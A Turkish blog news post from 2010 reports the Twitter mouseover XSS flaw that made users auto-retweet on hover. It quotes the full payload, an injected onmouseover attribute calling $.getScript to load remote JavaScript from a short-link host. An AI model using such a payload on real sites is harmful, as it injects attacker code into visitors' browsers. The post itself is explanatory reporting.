Browse > Home /

| Subcribe RSS

Twitter’ın mouseover java script açığı, tüm kullanıcıları etkiledi

September 21st, 2010 | No Comments | Posted in Exploit, Vulnerability

Bugün gerçekleşen bir güvenlik açığı, tüm twitter kullanıcılarını etkisi altına aldı. Twitter hesaplarını web üzerinden kullanan kullanıcıları etkisi altına alan bu kod açıklığı, listenizdeki kullanıcıların tweet’lerine yansıyan arka planı ve yazıtipi siyah bir şekilde karşımıza çıktı. Siz fare imlecinizi bu tweet’in üzerine getirir getirmez, otomatik olarak RT yani Re-tweet yapmanızı sağlayan ilgili açıklık, yine web tarayıcınıza twitter’dan kaynaklı olarak değişik hata mesajı içerikleriyle karşılandı. İçeriği aşağıdaki şekilde olan açıklığın, ekran görüntüsüne de aşağıdan ulaşabilirsiniz:

http://t.co/@”style=”font-size:999999999999px;”onmouseover=”$.getScript(‘http:\u002f\u002fis.gd\u002ffl9A7’)”/

Twitter Fail

http://yfrog.com/mqdirdp

Sorunun şimdilik giderilmesi için mobile.tweeter.com sitesi önerilirken, tweetdeck gibi 3rd yazılımların da, sorundan etkilenmediğini belirtmem gerekiyor. Resmi bir açıklama yapmayan twitter, benzer durumlarda kullandığı twitter hesabından kullandığı status raporlarından konunun XSS attack ‘a bağlı olarak açıklıktan faydalanıldığını ve kısa sürede giderileceğini haber vermiş.

Tags: , , , , , , , ,
  • Site istatistik

    Bugünkü ziyaret: 16
  • Add to Technorati Favorites

    Mail adresinizi girin:



  • Google Connnect
  • RSS DarkHardWare News